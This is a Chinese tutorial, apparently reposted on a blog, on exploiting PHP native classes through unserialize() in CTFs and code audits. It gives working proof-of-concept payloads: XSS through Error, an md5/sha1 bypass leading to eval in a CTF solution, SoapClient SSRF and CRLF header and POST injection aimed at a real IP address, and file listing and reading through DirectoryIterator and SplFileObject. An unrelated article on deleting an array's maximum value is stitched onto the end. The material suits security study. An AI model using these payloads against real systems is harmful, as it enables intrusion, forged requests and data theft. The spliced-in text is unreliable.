深入了解PHP反序列化原生类

本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于反序列化原生类的利用,如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢,下面一起来看一下,希望对大家有帮助。

本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于反序列化原生类的利用,如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢,下面一起来看一下,希望对大家有帮助。

深入了解PHP反序列化原生类

浅析php反序列化原生类的利用

如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。

一、常见魔术方法__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把对象当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发二、原生类中的魔术方法

我们采用下面脚本遍历一下所有原生类中的魔术方法

<?php$classes = get_declared_classes();foreach ($classes as $class) {
$methods = get_class_methods($class);
foreach ($methods as $method) {
if (in_array($method, array(
;__destruct;,
;__toString;,
;__wakeup;,
;__call;,
;__callStatic;,
;__get;,
;__set;,
;__isset;,
;__unset;,
;__invoke;,
;__set_state;
))) {
print $class . ;::; . $method . ;\n;;
}
}}三、一些常见原生类的利用Error/Exception

Error 是所有PHP内部错误类的基类。 (PHP 7, 8)

**Error::__toString ** error 的字符串表达

返回 Error 的 string表达形式。

Exception是所有用户级异常的基类。 (PHP 5, 7, 8)

**Exception::__toString ** 将异常对象转换为字符串

返回转换为字符串(string)类型的异常。

类属性

  • message 错误消息内容

  • code 错误代码

  • file 抛出错误的文件名

  • line 抛出错误的行数

XSS

__toString方法会返回错误或异常的字符串形式,其中包含我们输入的参数,如果我们构造一串xss代码,结合echo渲染,将触发反射形xss漏洞

示例:

<?php$a = unserialize($_GET[;a;]);echo $a;

POC:

<?php$a = new Error(;<script>alert(;xss;)</script>;);$b = serialize($a);echo urlencode($b);

深入了解PHP反序列化原生类

hash绕过

先看一道题

[2020 极客大挑战]Greatphp

<?phperror_reporting(0);class SYCLOVER {
public $syc;
public $lover;
public function __wakeup(){
if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
if(!preg_match(;/\<\?php|\(|\)|\;|\;/;, $this->syc, $match)){
eval($this->syc);
} else {
die(;Try Hard !!;);
}

}
}}if (isset($_GET[;great;])){
unserialize($_GET[;great;]);} else {
highlight_file(__FILE__);}

需要绕过两个hash强比较,且最终需要构造eval代码执行

显然正常方法是行不通的,而通过原生类可进行绕过

同样,当md5()和sha1()函数处理对象时,会自动调用__tostring方法

先简单看一下其输出

<?php$a=new Error(;payload;,1);$b=new Error(;payload;,2);$c=new Exception(;payload;,3);
$d=new Exception(;payload;,4);
echo $a.;<br>;;
echo $b.;<br>;;
echo $c.;<br>;;
echo $d;

深入了解PHP反序列化原生类

可以发现,这两个原生类返回的信息除了行号一模一样,利用这点,我们可以尝试进行hash函数的绕过,需要注意的是,必须将两个传入的对象放到同一行

因此我们可以进行简单的测试,发现使用此方法可以绕过hash强(弱)函数比较

<?php$a = new Error(;payload;,1);$b = new Error(;payload;,2);if ($a!=$b){
echo ;$a不等于$b;.;\n;;}if (md5($a)===md5($b)){
echo ;md5值相等\n;;}if (sha1($a)===sha1($b)){
echo ;sha1值相等;;}

深入了解PHP反序列化原生类

根据这些知识点,我们可以轻松构造payload

<?phpclass SYCLOVER {
public $syc;
public $lover;
public function __wakeup(){
if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
if(!preg_match(;/\<\?php|\(|\)|\;|\;/;, $this->syc, $match)){
eval($this->syc);
} else {
die(;Try Hard !!;);
}

}
}}$str = ;?><?=include~;.urldecode(;%D0%99%93%9E%98;).;?>;;//两次取反绕过正则$a=new Error($str,1);
$b=new Error($str,2);
$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
echo(urlencode(serialize($c)));?>SoapClient

SoapClient是一个专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端,可以创建soap数据报文,与wsdl接口进行交互

soap扩展模块默认关闭,使用时需手动开启

SoapClient::__call —调用 SOAP 函数 (PHP 5, 7, 8)

通常,SOAP 函数可以作为SoapClient对象的方法调用

SSRF

构造函数:

public SoapClient :: SoapClient(mixed $wsdl [,array $options ])
第一个参数是用来指明是否是wsdl模式,如果为`null`,那就是非wsdl模式。
第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要将请求发送到的SOAP服务器的URL,而uri 是SOAP服务的目标命名空间。

什么是soap

SOAP 是基于 XML 的简易协议,是用在分散或分布的环境中交换信息的简单的协议,可使应用程序在 HTTP 之上进行信息交换
SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发,查询webService ,SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口。
其采用HTTP作为底层通讯协议,XML作为数据传送的格式。

我们构造一个利用payload,第一个参数为NULL,第二个参数的location设置为vps地址

<?php
$a = new SoapClient(null, array(
;location; => ;http://47.102.146.95:2333;,
;uri; =>;uri;,
;user_agent;=>;111111;));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();

监听vps的2333端口,如下图所示成功触发SSRF,vps收到了请求信息

且可以看到SOAPAction和user_agent都可控

深入了解PHP反序列化原生类

本地测试时发现,当使用此内置类(即soap协议)请求存在服务的端口时,会立即报错,而去访问不存在服务(未占用)的端口时,会等待一段时间报错,可以以此进行内网资产的探测。

如果配合CRLF漏洞,还可以可通过 SoapClient 来控制其他参数或者post发送数据。例如:HTTP协议去攻击Redis

CRLF知识扩展

HTTP报文的结构:状态行和首部中的每行以CRLF结束,首部与主体之间由一空行分隔。
CRLF注入漏洞,是因为Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。
攻击者一旦向请求行或首部中的字段注入恶意的CRLF(\r\n),就能注入一些首部字段或报文主体,并在响应中输出。

通过结合CRLF,我们利用SoapClient+CRLF便可以干更多的事情,例如插入自定义Cookie,

<?php$a = new SoapClient(null, array(
;location; => ;http://47.102.146.95:2333;,
;uri; =>;uri;,
;user_agent;=>;111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a;));
$b = serialize($a);echo $b;$c = unserialize($b);$c->a();

深入了解PHP反序列化原生类

发送POST的数据包,这里需要将Content-Type设置为application/x-www-form-urlencoded,我们可以通过添加两个\r\n来将原来的Content-Type挤下去,自定义一个新的Content-Type

<?php$a = new SoapClient(null, array(
;location; => ;http://47.102.146.95:2333;,
;uri; =>;uri;,
;user_agent;=>;111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata;));
$b = serialize($a);echo $b;$c = unserialize($b);$c->a();

深入了解PHP反序列化原生类

看一道ctfshow上的题,完美利用上述知识点

$xff = explode(;,;, $_SERVER[;HTTP_X_FORWARDED_FOR;]);
array_pop($xff);
$ip = array_pop($xff); //获取xff头

if($ip!==;127.0.0.1;){
die(;error;);
}else{
$token = $_POST[;token;];
if($token==;ctfshow;){
file_put_contents(;flag.txt;,$flag);
}
}

poc:

<?php
$target = ;http://127.0.0.1/flag.php;;
$post_string = ;token=ctfshow;;
$b = new SoapClient(null,array(;location; => $target,;user_agent;=>;wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded;.;^^Content-Length: ;.(string)strlen($post_string).;^^^^;.$post_string,;uri;=> ;ssrf;));
$a = serialize($b);
$a = str_replace(;^^;,;\r\n;,$a);
echo urlencode($a);
?>DirectoryIterator/FilesystemIterator

DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。

DirectoryIterator::__toString 获取字符串形式的文件名 (PHP 5,7,8)

目录遍历

使用此内置类的__toString方法结合glob或file协议,即可实现目录遍历

例如:

<?php
$a = new DirectoryIterator(;glob:///*;);
foreach ($a as $b){
echo $b.;<br>;;
}

FilesystemIterator继承于DirectoryIterator,两者作用和用法基本相同,区别为FilesystemIterator会显示文件的完整路径,而DirectoryIterator只显示文件名

深入了解PHP反序列化原生类

因为可以配合使用glob伪协议(查找匹配的文件路径模式),所以可以绕过open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny来禁止一些类的反序列化,很不幸的是这两个原生类都在禁止名单当中

SplFileObject

SplFileObject 类为单个文件的信息提供了一个面向对象的高级接口

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件读取

SplFileObject::__toString — 以字符串形式返回文件的路径

<?phphighlight_file(__file__);$a = new SplFileObject(;./flag.txt;);echo $a;/*foreach($context as $f){
echo($a);
}*/

如果没有遍历的话只能读取第一行,且受到open_basedir影响

SimpleXMLElement

解析XML 文档中的元素。 (PHP 5、PHP 7、PHP 8)

SimpleXMLElement::__construct — 创建一个新的 SimpleXMLElement 对象

XXE

我们查看一下其参数:

深入了解PHP反序列化原生类

根据官方文档,发现当第三个参数为True时,即可实现远程xml文件载入,第二个参数的常量值设置为2即可。

利用可参考赛题:[SUCTF 2018]Homework

ReflectionMethod获取注释内容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 获取注释内容 由该原生类中的getDocComment方法可以访问到注释的内容

深入了解PHP反序列化原生类

同时可利用的原生类还有ZipArchive– 删除文件等等,不在叙述

php数组怎么删除最大值

两种方法:1、遍历数组,用unset()删除最大的元素,语法“foreach($a as $k=>$v){if($v==max($a)){unset($a[$k]);}}”。2、用“sort($a);array_pop($a);”语句删除。

深入了解PHP反序列化原生类

本教程操作环境:windows7系统、PHP8.1版、DELL G3电脑

php数组删除最大值的两种方法

1、遍历数组,使用unset()删除最大的元素

  • 使用foreach遍历数组

  • 在循环体中,找到最大值的元素

  • 使用unset()删除该元素

<?php
header("Content-type:text/html;charset=utf-8");
$arr=array(1,45,9,52,0,-5,21,-1,40);
var_dump($arr);
$max=max($arr);
echo "最大值为:".$max;
foreach($arr as $k=>$v){
if($v==$max){
unset($arr[$k]);
}
}
echo "<br><br>删除最大值后:";
var_dump($arr);
?>

深入了解PHP反序列化原生类

2、对数组进行升序排序,用array_pop()删除最大的元素

  • 使用sort()对数组进行升序排序

  • 排序后该数组的最后一个元素就是最大值,只需使用array_pop()删除即可。

    array_pop():删除数组中的最后一个元素。

<?php
header("Content-type:text/html;charset=utf-8");
$arr=array(1,45,9,52,0,-5,21,-1,40);
var_dump($arr);
sort($arr);
var_dump($arr);
array_pop($arr); //去掉最大值
var_dump($arr);
?>

深入了解PHP反序列化原生类

以上就是php数组怎么删除最大值的详细内容,更多请关注钦钦技术栈其它相关文章!

转载至:php中文网【www.php.cn】

版权声明:本文(即:原文链接:https://www.qin1qin.com/catagory/23459/)内容由互联网用户自发投稿贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 630367839@qq.com 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022-09-19 12:54:10
下一篇 2022-09-19 12:55:23

软件定制开发公司

相关阅读

发表回复

登录后才能评论
通知:禁止投稿所有关于虚拟货币,币圈类相关文章,发现立即永久封锁账户ID!